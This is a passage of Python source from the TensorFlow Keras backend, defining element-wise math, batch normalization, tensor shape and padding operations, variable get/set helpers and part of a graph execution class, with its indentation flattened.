Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.abs(x)
@keras_export('keras.backend.sqrt')
def sqrt(x):
"""Element-wise square root.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
zero = _constant_to_tensor(0., x.dtype.base_dtype)
inf = _constant_to_tensor(np.inf, x.dtype.base_dtype)
x = clip_ops.clip_by_value(x, zero, inf)
return math_ops.sqrt(x)
@keras_export('keras.backend.exp')
def exp(x):
"""Element-wise exponential.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.exp(x)
@keras_export('keras.backend.log')
def log(x):
"""Element-wise log.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.log(x)
def logsumexp(x, axis=None, keepdims=False):
"""Computes log(sum(exp(elements across dimensions of a tensor))).
This function is more numerically stable than log(sum(exp(x))).
It avoids overflows caused by taking the exp of large inputs and
underflows caused by taking the log of small inputs.
Arguments:
x: A tensor or variable.
axis: An integer, the axis to reduce over.
keepdims: A boolean, whether to keep the dimensions or not.
If `keepdims` is `False`, the rank of the tensor is reduced
by 1. If `keepdims` is `True`, the reduced dimension is
retained with length 1.
Returns:
The reduced tensor.
"""
return math_ops.reduce_logsumexp(x, axis, keepdims)
@keras_export('keras.backend.round')
def round(x):
"""Element-wise rounding to the closest integer.
In case of tie, the rounding mode used is "half to even".
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.round(x)
@keras_export('keras.backend.sign')
def sign(x):
"""Element-wise sign.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.sign(x)
@keras_export('keras.backend.pow')
def pow(x, a):
"""Element-wise exponentiation.
Arguments:
x: Tensor or variable.
a: Python integer.
Returns:
A tensor.
"""
return math_ops.pow(x, a)
@keras_export('keras.backend.clip')
def clip(x, min_value, max_value):
"""Element-wise value clipping.
Arguments:
x: Tensor or variable.
min_value: Python float or integer.
max_value: Python float or integer.
Returns:
A tensor.
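  Example:
  A minimal sketch (illustrative values; output formatting may vary):
  ```python
      >>> x = K.constant([-1., 0.5, 2.])
      >>> K.eval(K.clip(x, min_value=0., max_value=1.))
      array([ 0. ,  0.5,  1. ], dtype=float32)
  ```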
"""
if max_value is not None and max_value < min_value:
max_value = min_value
if max_value is None:
max_value = np.inf
min_value = _constant_to_tensor(min_value, x.dtype.base_dtype)
max_value = _constant_to_tensor(max_value, x.dtype.base_dtype)
return clip_ops.clip_by_value(x, min_value, max_value)
@keras_export('keras.backend.equal')
def equal(x, y):
"""Element-wise equality between two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.equal(x, y)
@keras_export('keras.backend.not_equal')
def not_equal(x, y):
"""Element-wise inequality between two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.not_equal(x, y)
@keras_export('keras.backend.greater')
def greater(x, y):
"""Element-wise truth value of (x > y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.greater(x, y)
@keras_export('keras.backend.greater_equal')
def greater_equal(x, y):
"""Element-wise truth value of (x >= y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.greater_equal(x, y)
@keras_export('keras.backend.less')
def less(x, y):
"""Element-wise truth value of (x < y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.less(x, y)
@keras_export('keras.backend.less_equal')
def less_equal(x, y):
"""Element-wise truth value of (x <= y).
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A bool tensor.
"""
return math_ops.less_equal(x, y)
@keras_export('keras.backend.maximum')
def maximum(x, y):
"""Element-wise maximum of two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.maximum(x, y)
@keras_export('keras.backend.minimum')
def minimum(x, y):
"""Element-wise minimum of two tensors.
Arguments:
x: Tensor or variable.
y: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.minimum(x, y)
@keras_export('keras.backend.sin')
def sin(x):
"""Computes sin of x element-wise.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.sin(x)
@keras_export('keras.backend.cos')
def cos(x):
"""Computes cos of x element-wise.
Arguments:
x: Tensor or variable.
Returns:
A tensor.
"""
return math_ops.cos(x)
def _regular_normalize_batch_in_training(x,
gamma,
beta,
reduction_axes,
epsilon=1e-3):
"""Non-fused version of `normalize_batch_in_training`.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
mean, var = nn.moments(x, reduction_axes, None, None, False)
normed = nn.batch_normalization(x, mean, var, beta, gamma, epsilon)
return normed, mean, var
def _broadcast_normalize_batch_in_training(x,
gamma,
beta,
reduction_axes,
epsilon=1e-3):
"""Non-fused, broadcast version of `normalize_batch_in_training`.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
mean, var = nn.moments(x, reduction_axes, None, None, False)
target_shape = []
for axis in range(ndim(x)):
if axis in reduction_axes:
target_shape.append(1)
else:
target_shape.append(array_ops.shape(x)[axis])
target_shape = array_ops.stack(target_shape)
broadcast_mean = array_ops.reshape(mean, target_shape)
broadcast_var = array_ops.reshape(var, target_shape)
if gamma is None:
broadcast_gamma = None
else:
broadcast_gamma = array_ops.reshape(gamma, target_shape)
if beta is None:
broadcast_beta = None
else:
broadcast_beta = array_ops.reshape(beta, target_shape)
normed = nn.batch_normalization(x, broadcast_mean, broadcast_var,
broadcast_beta, broadcast_gamma, epsilon)
return normed, mean, var
def _fused_normalize_batch_in_training(x,
gamma,
beta,
reduction_axes,
epsilon=1e-3):
"""Fused version of `normalize_batch_in_training`.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
if list(reduction_axes) == [0, 1, 2]:
normalization_axis = 3
tf_data_format = 'NHWC'
else:
normalization_axis = 1
tf_data_format = 'NCHW'
if gamma is None:
gamma = constant_op.constant(
1.0, dtype=x.dtype, shape=[x.shape[normalization_axis]])
if beta is None:
beta = constant_op.constant(
0.0, dtype=x.dtype, shape=[x.shape[normalization_axis]])
return nn.fused_batch_norm(
x, gamma, beta, epsilon=epsilon, data_format=tf_data_format)
@keras_export('keras.backend.normalize_batch_in_training')
def normalize_batch_in_training(x, gamma, beta, reduction_axes, epsilon=1e-3):
"""Computes mean and std for batch then apply batch_normalization on batch.
Arguments:
x: Input tensor or variable.
gamma: Tensor by which to scale the input.
beta: Tensor with which to center the input.
reduction_axes: iterable of integers,
axes over which to normalize.
epsilon: Fuzz factor.
Returns:
A tuple length of 3, `(normalized_tensor, mean, variance)`.
"""
if ndim(x) == 4 and list(reduction_axes) in [[0, 1, 2], [0, 2, 3]]:
if not _has_nchw_support() and list(reduction_axes) == [0, 2, 3]:
return _broadcast_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
return _fused_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
else:
if sorted(reduction_axes) == list(range(ndim(x)))[:-1]:
return _regular_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
else:
return _broadcast_normalize_batch_in_training(
x, gamma, beta, reduction_axes, epsilon=epsilon)
@keras_export('keras.backend.batch_normalization')
def batch_normalization(x, mean, var, beta, gamma, axis=-1, epsilon=1e-3):
"""Applies batch normalization on x given mean, var, beta and gamma.
I.e. returns:
  `output = (x - mean) / sqrt(var + epsilon) * gamma + beta`
Arguments:
x: Input tensor or variable.
mean: Mean of batch.
var: Variance of batch.
beta: Tensor with which to center the input.
gamma: Tensor by which to scale the input.
axis: Integer, the axis that should be normalized.
(typically the features axis).
epsilon: Fuzz factor.
Returns:
A tensor.
"""
if ndim(x) == 4:
# The CPU implementation of `fused_batch_norm` only supports NHWC
if axis == 1 or axis == -3:
tf_data_format = 'NCHW'
elif axis == 3 or axis == -1:
tf_data_format = 'NHWC'
else:
tf_data_format = None
if (tf_data_format == 'NHWC' or
tf_data_format == 'NCHW' and _has_nchw_support()):
# The mean / var / beta / gamma tensors may be broadcasted
# so they may have extra axes of size 1, which should be squeezed.
if ndim(mean) > 1:
mean = array_ops.reshape(mean, [-1])
if ndim(var) > 1:
var = array_ops.reshape(var, [-1])
if beta is None:
beta = zeros_like(mean)
elif ndim(beta) > 1:
beta = array_ops.reshape(beta, [-1])
if gamma is None:
gamma = ones_like(mean)
elif ndim(gamma) > 1:
gamma = array_ops.reshape(gamma, [-1])
y, _, _ = nn.fused_batch_norm(
x,
gamma,
beta,
epsilon=epsilon,
mean=mean,
variance=var,
data_format=tf_data_format,
is_training=False
)
return y
return nn.batch_normalization(x, mean, var, beta, gamma, epsilon)
# SHAPE OPERATIONS
@keras_export('keras.backend.concatenate')
def concatenate(tensors, axis=-1):
"""Concatenates a list of tensors alongside the specified axis.
Arguments:
tensors: list of tensors to concatenate.
axis: concatenation axis.
Returns:
A tensor.
"""
if axis < 0:
rank = ndim(tensors[0])
if rank:
axis %= rank
else:
axis = 0
if py_all(is_sparse(x) for x in tensors):
return sparse_ops.sparse_concat(axis, tensors)
else:
return array_ops.concat([to_dense(x) for x in tensors], axis)
@keras_export('keras.backend.reshape')
def reshape(x, shape):
"""Reshapes a tensor to the specified shape.
Arguments:
x: Tensor or variable.
shape: Target shape tuple.
Returns:
A tensor.
"""
return array_ops.reshape(x, shape)
@keras_export('keras.backend.permute_dimensions')
def permute_dimensions(x, pattern):
"""Permutes axes in a tensor.
Arguments:
x: Tensor or variable.
pattern: A tuple of
dimension indices, e.g. `(0, 2, 1)`.
Returns:
A tensor.
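  Example:
  A shape-only sketch (assumed shapes):
  ```python
      >>> x = K.ones((2, 3, 4))
      >>> K.int_shape(K.permute_dimensions(x, (0, 2, 1)))
      (2, 4, 3)
  ```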
"""
return array_ops.transpose(x, perm=pattern)
@keras_export('keras.backend.resize_images')
def resize_images(x, height_factor, width_factor, data_format,
interpolation='nearest'):
"""Resizes the images contained in a 4D tensor.
Arguments:
x: Tensor or variable to resize.
height_factor: Positive integer.
width_factor: Positive integer.
data_format: One of `"channels_first"`, `"channels_last"`.
interpolation: A string, one of `nearest` or `bilinear`.
Returns:
A tensor.
Raises:
ValueError: in case of incorrect value for
`data_format` or `interpolation`.
"""
if data_format == 'channels_first':
rows, cols = 2, 3
elif data_format == 'channels_last':
rows, cols = 1, 2
else:
raise ValueError('Invalid `data_format` argument: %s' % (data_format,))
original_shape = int_shape(x)
new_shape = array_ops.shape(x)[rows:cols + 1]
new_shape *= constant_op.constant(
np.array([height_factor, width_factor], dtype='int32'))
if data_format == 'channels_first':
x = permute_dimensions(x, [0, 2, 3, 1])
if interpolation == 'nearest':
x = image_ops.resize_nearest_neighbor(x, new_shape)
elif interpolation == 'bilinear':
x = image_ops.resize_bilinear(x, new_shape)
else:
raise ValueError('interpolation should be one '
'of "nearest" or "bilinear".')
if data_format == 'channels_first':
x = permute_dimensions(x, [0, 3, 1, 2])
if original_shape[rows] is None:
new_height = None
else:
new_height = original_shape[rows] * height_factor
if original_shape[cols] is None:
new_width = None
else:
new_width = original_shape[cols] * width_factor
if data_format == 'channels_first':
output_shape = (None, None, new_height, new_width)
else:
output_shape = (None, new_height, new_width, None)
x.set_shape(output_shape)
return x
@keras_export('keras.backend.resize_volumes')
def resize_volumes(x, depth_factor, height_factor, width_factor, data_format):
"""Resizes the volume contained in a 5D tensor.
Arguments:
x: Tensor or variable to resize.
depth_factor: Positive integer.
height_factor: Positive integer.
width_factor: Positive integer.
data_format: One of `"channels_first"`, `"channels_last"`.
Returns:
A tensor.
Raises:
ValueError: if `data_format` is neither
      `channels_last` nor `channels_first`.
"""
if data_format == 'channels_first':
output = repeat_elements(x, depth_factor, axis=2)
output = repeat_elements(output, height_factor, axis=3)
output = repeat_elements(output, width_factor, axis=4)
return output
elif data_format == 'channels_last':
output = repeat_elements(x, depth_factor, axis=1)
output = repeat_elements(output, height_factor, axis=2)
output = repeat_elements(output, width_factor, axis=3)
return output
else:
raise ValueError('Invalid data_format: ' + str(data_format))
@keras_export('keras.backend.repeat_elements')
def repeat_elements(x, rep, axis):
"""Repeats the elements of a tensor along an axis, like `np.repeat`.
If `x` has shape `(s1, s2, s3)` and `axis` is `1`, the output
will have shape `(s1, s2 * rep, s3)`.
Arguments:
x: Tensor or variable.
rep: Python integer, number of times to repeat.
axis: Axis along which to repeat.
Returns:
A tensor.
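  Example:
  An illustrative sketch mirroring `np.repeat` (values are made up):
  ```python
      >>> x = K.constant([[1., 2.], [3., 4.]])
      >>> K.eval(K.repeat_elements(x, rep=2, axis=1))
      array([[ 1.,  1.,  2.,  2.],
             [ 3.,  3.,  4.,  4.]], dtype=float32)
  ```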
"""
x_shape = x.shape.as_list()
# For static axis
if x_shape[axis] is not None:
# slices along the repeat axis
splits = array_ops.split(value=x,
num_or_size_splits=x_shape[axis],
axis=axis)
# repeat each slice the given number of reps
x_rep = [s for s in splits for _ in range(rep)]
return concatenate(x_rep, axis)
# Here we use tf.tile to mimic behavior of np.repeat so that
# we can handle dynamic shapes (that include None).
# To do that, we need an auxiliary axis to repeat elements along
# it and then merge them along the desired axis.
# Repeating
auxiliary_axis = axis + 1
x_shape = array_ops.shape(x)
x_rep = array_ops.expand_dims(x, axis=auxiliary_axis)
reps = np.ones(len(x.shape) + 1)
reps[auxiliary_axis] = rep
x_rep = array_ops.tile(x_rep, reps)
# Merging
reps = np.delete(reps, auxiliary_axis)
reps[axis] = rep
reps = array_ops.constant(reps, dtype='int32')
x_shape *= reps
x_rep = array_ops.reshape(x_rep, x_shape)
# Fix shape representation
x_shape = x.shape.as_list()
x_rep.set_shape(x_shape)
x_rep._keras_shape = tuple(x_shape)
return x_rep
@keras_export('keras.backend.repeat')
def repeat(x, n):
"""Repeats a 2D tensor.
  If `x` has shape `(samples, dim)` and `n` is `2`,
the output will have shape `(samples, 2, dim)`.
Arguments:
x: Tensor or variable.
n: Python integer, number of times to repeat.
Returns:
A tensor.
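  Example:
  A shape-only sketch (illustrative values):
  ```python
      >>> x = K.constant([[1., 2.], [3., 4.]])  # shape (2, 2)
      >>> K.int_shape(K.repeat(x, 3))
      (2, 3, 2)
  ```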
"""
assert ndim(x) == 2
x = array_ops.expand_dims(x, 1)
pattern = array_ops.stack([1, n, 1])
return array_ops.tile(x, pattern)
@keras_export('keras.backend.arange')
def arange(start, stop=None, step=1, dtype='int32'):
"""Creates a 1D tensor containing a sequence of integers.
The function arguments use the same convention as
Theano's arange: if only one argument is provided,
it is in fact the "stop" argument and "start" is 0.
The default type of the returned tensor is `'int32'` to
match TensorFlow's default.
Arguments:
start: Start value.
stop: Stop value.
step: Difference between two successive values.
dtype: Integer dtype to use.
Returns:
An integer tensor.
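  Example:
  An illustrative sketch (output formatting may vary):
  ```python
      >>> K.eval(K.arange(5))
      array([0, 1, 2, 3, 4], dtype=int32)
      >>> K.eval(K.arange(2, 10, 2))
      array([2, 4, 6, 8], dtype=int32)
  ```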
"""
# Match the behavior of numpy and Theano by returning an empty sequence.
if stop is None and start < 0:
start = 0
result = math_ops.range(start, limit=stop, delta=step, name='arange')
if dtype != 'int32':
result = cast(result, dtype)
return result
@keras_export('keras.backend.tile')
def tile(x, n):
"""Creates a tensor by tiling `x` by `n`.
Arguments:
x: A tensor or variable
n: A list of integer. The length must be the same as the number of
dimensions in `x`.
Returns:
A tiled tensor.
"""
if isinstance(n, int):
n = [n]
return array_ops.tile(x, n)
@keras_export('keras.backend.flatten')
def flatten(x):
"""Flatten a tensor.
Arguments:
x: A tensor or variable.
Returns:
A tensor, reshaped into 1-D
"""
return array_ops.reshape(x, [-1])
@keras_export('keras.backend.batch_flatten')
def batch_flatten(x):
"""Turn a nD tensor into a 2D tensor with same 0th dimension.
In other words, it flattens each data samples of a batch.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
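  Example:
  For example (shapes are made up):
  ```python
      >>> x = K.ones((2, 3, 4))
      >>> K.eval(K.batch_flatten(x)).shape
      (2, 12)
  ```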
"""
x = array_ops.reshape(x, array_ops.stack([-1, prod(shape(x)[1:])]))
return x
@keras_export('keras.backend.expand_dims')
def expand_dims(x, axis=-1):
"""Adds a 1-sized dimension at index "axis".
Arguments:
x: A tensor or variable.
axis: Position where to add a new axis.
Returns:
A tensor with expanded dimensions.
"""
return array_ops.expand_dims(x, axis)
@keras_export('keras.backend.squeeze')
def squeeze(x, axis):
"""Removes a 1-dimension from the tensor at index "axis".
Arguments:
x: A tensor or variable.
axis: Axis to drop.
Returns:
A tensor with the same data as `x` but reduced dimensions.
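  Example:
  For example (shapes are illustrative):
  ```python
      >>> x = K.ones((2, 1, 3))
      >>> K.int_shape(K.squeeze(x, 1))
      (2, 3)
  ```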
"""
return array_ops.squeeze(x, [axis])
@keras_export('keras.backend.temporal_padding')
def temporal_padding(x, padding=(1, 1)):
"""Pads the middle dimension of a 3D tensor.
Arguments:
x: Tensor or variable.
padding: Tuple of 2 integers, how many zeros to
add at the start and end of dim 1.
Returns:
A padded 3D tensor.
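  Example:
  For example, padding one step before and two steps after the time
  dimension (shapes are illustrative):
  ```python
      >>> x = K.ones((2, 3, 4))
      >>> K.int_shape(K.temporal_padding(x, padding=(1, 2)))
      (2, 6, 4)
  ```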
"""
assert len(padding) == 2
pattern = [[0, 0], [padding[0], padding[1]], [0, 0]]
return array_ops.pad(x, pattern)
@keras_export('keras.backend.spatial_2d_padding')
def spatial_2d_padding(x, padding=((1, 1), (1, 1)), data_format=None):
"""Pads the 2nd and 3rd dimensions of a 4D tensor.
Arguments:
x: Tensor or variable.
padding: Tuple of 2 tuples, padding pattern.
data_format: One of `channels_last` or `channels_first`.
Returns:
A padded 4D tensor.
Raises:
ValueError: if `data_format` is neither
      `channels_last` nor `channels_first`.
"""
assert len(padding) == 2
assert len(padding[0]) == 2
assert len(padding[1]) == 2
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if data_format == 'channels_first':
pattern = [[0, 0], [0, 0], list(padding[0]), list(padding[1])]
else:
pattern = [[0, 0], list(padding[0]), list(padding[1]), [0, 0]]
return array_ops.pad(x, pattern)
@keras_export('keras.backend.spatial_3d_padding')
def spatial_3d_padding(x, padding=((1, 1), (1, 1), (1, 1)), data_format=None):
"""Pads 5D tensor with zeros along the depth, height, width dimensions.
Pads these dimensions with respectively
"padding[0]", "padding[1]" and "padding[2]" zeros left and right.
For 'channels_last' data_format,
the 2nd, 3rd and 4th dimension will be padded.
For 'channels_first' data_format,
the 3rd, 4th and 5th dimension will be padded.
Arguments:
x: Tensor or variable.
padding: Tuple of 3 tuples, padding pattern.
data_format: One of `channels_last` or `channels_first`.
Returns:
A padded 5D tensor.
Raises:
ValueError: if `data_format` is neither
      `channels_last` nor `channels_first`.
"""
assert len(padding) == 3
assert len(padding[0]) == 2
assert len(padding[1]) == 2
assert len(padding[2]) == 2
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if data_format == 'channels_first':
pattern = [[0, 0], [0, 0], [padding[0][0], padding[0][1]],
[padding[1][0], padding[1][1]], [padding[2][0], padding[2][1]]]
else:
pattern = [[0, 0], [padding[0][0], padding[0][1]],
[padding[1][0], padding[1][1]], [padding[2][0],
padding[2][1]], [0, 0]]
return array_ops.pad(x, pattern)
@keras_export('keras.backend.stack')
def stack(x, axis=0):
"""Stacks a list of rank `R` tensors into a rank `R+1` tensor.
Arguments:
x: List of tensors.
axis: Axis along which to perform stacking.
Returns:
A tensor.
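  Example:
  A minimal sketch with made-up values:
  ```python
      >>> a = K.constant([1., 2.])
      >>> b = K.constant([3., 4.])
      >>> K.eval(K.stack([a, b]))
      array([[ 1.,  2.],
             [ 3.,  4.]], dtype=float32)
  ```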
"""
return array_ops.stack(x, axis=axis)
@keras_export('keras.backend.one_hot')
def one_hot(indices, num_classes):
"""Computes the one-hot representation of an integer tensor.
Arguments:
indices: nD integer tensor of shape
`(batch_size, dim1, dim2, ... dim(n-1))`
num_classes: Integer, number of classes to consider.
  Returns:
      (n + 1)D one hot representation of the input
      with shape `(batch_size, dim1, dim2, ... dim(n-1), num_classes)`.
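  Example:
  An illustrative sketch (indices and class count are made up):
  ```python
      >>> indices = K.constant([0, 2], dtype='int32')
      >>> K.eval(K.one_hot(indices, num_classes=3))
      array([[ 1.,  0.,  0.],
             [ 0.,  0.,  1.]], dtype=float32)
  ```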
"""
return array_ops.one_hot(indices, depth=num_classes, axis=-1)
@keras_export('keras.backend.reverse')
def reverse(x, axes):
"""Reverse a tensor along the specified axes.
Arguments:
x: Tensor to reverse.
axes: Integer or iterable of integers.
Axes to reverse.
Returns:
A tensor.
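  Example:
  A minimal sketch (values are illustrative):
  ```python
      >>> x = K.constant([1., 2., 3.])
      >>> K.eval(K.reverse(x, axes=0))
      array([ 3.,  2.,  1.], dtype=float32)
  ```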
"""
if isinstance(axes, int):
axes = [axes]
return array_ops.reverse(x, axes)
# VALUE MANIPULATION
@keras_export('keras.backend.get_value')
def get_value(x):
"""Returns the value of a variable.
Arguments:
x: input variable.
Returns:
A Numpy array.
Raises:
RuntimeError: If this method is called inside defun.
"""
if context.executing_eagerly():
return x.numpy()
elif not getattr(x, '_in_graph_mode', True):
# This is a variable which was created in an eager context, but is being
# evaluated from a Graph.
with context.eager_mode():
return x.numpy()
elif ops.inside_function():
raise RuntimeError('Cannot get value inside Tensorflow graph function.')
return x.eval(session=get_session((x,)))
@keras_export('keras.backend.batch_get_value')
def batch_get_value(tensors):
"""Returns the value of more than one tensor variable.
Arguments:
tensors: list of ops to run.
Returns:
A list of Numpy arrays.
Raises:
RuntimeError: If this method is called inside defun.
"""
if context.executing_eagerly():
return [x.numpy() for x in tensors]
elif ops.inside_function(): # pylint: disable=protected-access
raise RuntimeError('Cannot get value inside Tensorflow graph function.')
if tensors:
return get_session(tensors).run(tensors)
else:
return []
@keras_export('keras.backend.set_value')
def set_value(x, value):
"""Sets the value of a variable, from a Numpy array.
Arguments:
x: Tensor to set to a new value.
value: Value to set the tensor to, as a Numpy array
(of the same shape).
"""
value = np.asarray(value, dtype=dtype(x))
if ops.executing_eagerly_outside_functions():
x.assign(value)
else:
with get_graph().as_default():
tf_dtype = dtypes_module.as_dtype(x.dtype.name.split('_')[0])
if hasattr(x, '_assign_placeholder'):
assign_placeholder = x._assign_placeholder
assign_op = x._assign_op
else:
assign_placeholder = array_ops.placeholder(tf_dtype, shape=value.shape)
assign_op = x.assign(assign_placeholder)
x._assign_placeholder = assign_placeholder
x._assign_op = assign_op
get_session().run(assign_op, feed_dict={assign_placeholder: value})
@keras_export('keras.backend.batch_set_value')
def batch_set_value(tuples):
"""Sets the values of many tensor variables at once.
Arguments:
tuples: a list of tuples `(tensor, value)`.
`value` should be a Numpy array.
"""
if ops.executing_eagerly_outside_functions():
for x, value in tuples:
x.assign(np.asarray(value, dtype=dtype(x)))
else:
with get_graph().as_default():
if tuples:
assign_ops = []
feed_dict = {}
for x, value in tuples:
value = np.asarray(value, dtype=dtype(x))
tf_dtype = dtypes_module.as_dtype(x.dtype.name.split('_')[0])
if hasattr(x, '_assign_placeholder'):
assign_placeholder = x._assign_placeholder
assign_op = x._assign_op
else:
assign_placeholder = array_ops.placeholder(tf_dtype,
shape=value.shape)
assign_op = x.assign(assign_placeholder)
x._assign_placeholder = assign_placeholder
x._assign_op = assign_op
assign_ops.append(assign_op)
feed_dict[assign_placeholder] = value
get_session().run(assign_ops, feed_dict=feed_dict)
@keras_export('keras.backend.print_tensor')
def print_tensor(x, message=''):
"""Prints `message` and the tensor value when evaluated.
Note that `print_tensor` returns a new tensor identical to `x`
which should be used in the following code. Otherwise the
print operation is not taken into account during evaluation.
Example:
```python
>>> x = K.print_tensor(x, message="x is: ")
```
Arguments:
x: Tensor to print.
message: Message to print jointly with the tensor.
Returns:
The same tensor `x`, unchanged.
"""
return logging_ops.Print(x, [x], message)
# GRAPH MANIPULATION
class GraphExecutionFunction(object):
"""Runs a computation graph.
  It's possible to pass arguments to `tf.Session.run()` via `session_kwargs`.
  In particular, additional operations can be passed via the `fetches`
  argument and additional tensor substitutions via the `feed_dict` argument.
  Note that the given substitutions are merged with substitutions from
  `inputs`. Even though `feed_dict` is passed once in the constructor (called
  in `model.compile()`), we can modify the values in the dictionary. Through
  this `feed_dict` we can provide additional substitutions besides Keras
  inputs.
Arguments:
inputs: Feed placeholders to the computation graph.
outputs: Output tensors to fetch.
updates: Additional update ops to be run at function call.
name: A name to help users identify what this function does.
session_kwargs: Arguments to `tf.Session.run()`:
`fetches`, `feed_dict`, `options`, `run_metadata`.
"""
def __init__(self, inputs, outputs, updates=None, name=None,
**session_kwargs):
updates = updates or []
if not isinstance(updates, (list, tuple)):
raise TypeError('`updates` in a Keras backend function '
'should be a list or tuple.')
self.inputs = nest.flatten(inputs)
self._outputs_structure = outputs
self.outputs = cast_variables_to_tensor(nest.flatten(outputs))
# TODO(b/127668432): Consider using autograph to generate these
# dependencies in call.
# Index 0 = total loss or model output for `predict`.
with ops.control_dependencies([self.outputs[0]]):
updates_ops = []
for update in updates:
if isinstance(update, tuple):
p, new_p = update
updates_ops.append(state_ops.assign(p, new_p))
else:
# assumed already an op
updates_ops.append(update)
self.updates_op = control_flow_ops.group(*updates_ops)
self.name = name
# additional tensor substitutions
self.feed_dict = session_kwargs.pop('feed_dict', None)
# additional operations
self.fetches = session_kwargs.pop('fetches', [])
if not isinstance(self.fetches, list):
self.fetches = [self.fetches]
self.run_options = session_kwargs.pop('options', None)
self.run_metadata = session_kwargs.pop('run_metadata', None)
# The main use case of `fetches` being passed to a model is the ability
# to run custom updates
# This requires us to wrap fetches in `identity` ops.
self.fetches = [array_ops.identity(x) for x in self.fetches]
self.session_kwargs = session_kwargs
# This mapping keeps track of the function that should receive the
# output from a fetch in `fetches`: { fetch: function(fetch_output) }
# A Callback can use this to register a function with access to the
# output values for a fetch it added.
self.fetch_callbacks = {}
if session_kwargs:
raise ValueError('Some keys in session_kwargs are not supported at this '
'time: %s' % (session_kwargs.keys(),))
self._callable_fn = None
self._feed_arrays = None
self._feed_symbols = None
self._symbol_vals = None
self._fetches = None
self._session = None
def _make_callable(self, feed_arrays, feed_symbols, symbol_vals, session):
"""Generates a callable that runs the graph.
Arguments:
feed_arrays: List of input tensors to be fed Numpy arrays at runtime.
feed_symbols: List of input tensors to be fed symbolic tensors at runtime.
symbol_vals: List of symbolic tensors to be fed to `feed_symbols`.
session: Session to use to generate the callable.
Returns:
Function that runs the graph according to the above options.
"""
# Prepare callable options.
callable_opts = config_pb2.CallableOptions()
# Handle external-data feed.
for x in feed_arrays:
callable_opts.feed.append(x.name)
if self.feed_dict:
for key in sorted(self.feed_dict.keys()):
callable_opts.feed.append(key.name)
# Handle symbolic feed.
for x, y in zip(feed_symbols, symbol_vals):
connection = callable_opts.tensor_connection.add()
if x.dtype != y.dtype:
y = math_ops.cast(y, dtype=x.dtype)
from_tensor = ops._as_graph_element(y)
if from_tensor is None:
from_tensor = y
connection.from_tensor = from_tensor.name # Data tensor
connection.to_tensor = x.name # Placeholder
# Handle fetches.
for x in self.outputs + self.fetches:
callable_opts.fetch.append(x.name)
# Handle updates.
callable_opts.target.append(self.updates_op.name)
# Handle run_options.
if self.run_options:
callable_opts.run_options.CopyFrom(self.run_options)
# Create callable.
callable_fn = session._make_callable_from_options(callable_opts)
# Cache parameters corresponding to the generated callable, so that
# we can detect future mismatches and refresh the callable.
self._callable_fn = callable_fn
self._feed_arrays = feed_arrays
self._feed_symbols = feed_symbols
self._symbol_vals = symbol_vals
self._fetches = list(self.fetches)
self._session = session
def _call_fetch_callbacks(self, fetches_output):
for fetch, output in zip(self._fetches, fetches_output):
if fetch in self.fetch_callbacks:
self.fetch_callbacks[fetch](output)
def __call__(self, inputs):
inputs = nest.flatten(inputs)
session = get_session(inputs)
feed_arrays = []
array_vals = []
feed_symbols = []
symbol_vals = []
for tensor, value in zip(self.inputs, inputs):
if value is None:
continue
if is_sparse(tensor):
sparse_coo = value.tocoo()
indices = np.concatenate((np.expand_dims(sparse_coo.row, 1),
np.expand_dims(sparse_coo.col, 1)), 1)
value = (indices, sparse_coo.data, sparse_coo.shape)
if tensor_util.is_tensor(value):
# Case: feeding symbolic tensor.
feed_symbols.append(tensor)
symbol_vals.append(value)
else:
# Case: feeding Numpy array.
feed_arrays.append(tensor)
# We need to do array conversion and type casting at this level, since
# `callable_fn` only supports exact matches.
tensor_type = dtypes_module.as_dtype(tensor.dtype)
array_vals.append(np.asarray(value,
dtype=tensor_type.as_numpy_dtype))
if self.feed_dict:
for key in sorted(self.feed_dict.keys()):
array_vals.append(
np.asarray(self.feed_dict[key], dtype=key.dtype.base_dtype.name))
# Refresh callable if anything has changed.
if (self._callable_fn is None or feed_arrays != self._feed_arrays or
symbol_vals != self._symbol_vals or
feed_symbols != self._feed_symbols or self.fetches != self._fetches or
session != self._session):
self._make_callable(feed_arrays, feed_symbols, symbol_vals, session)
fetched = self._callable_fn(*array_vals,
run_metadata=self.run_metadata)
self._call_fetch_callbacks(fetched[-len(self._fetches):])
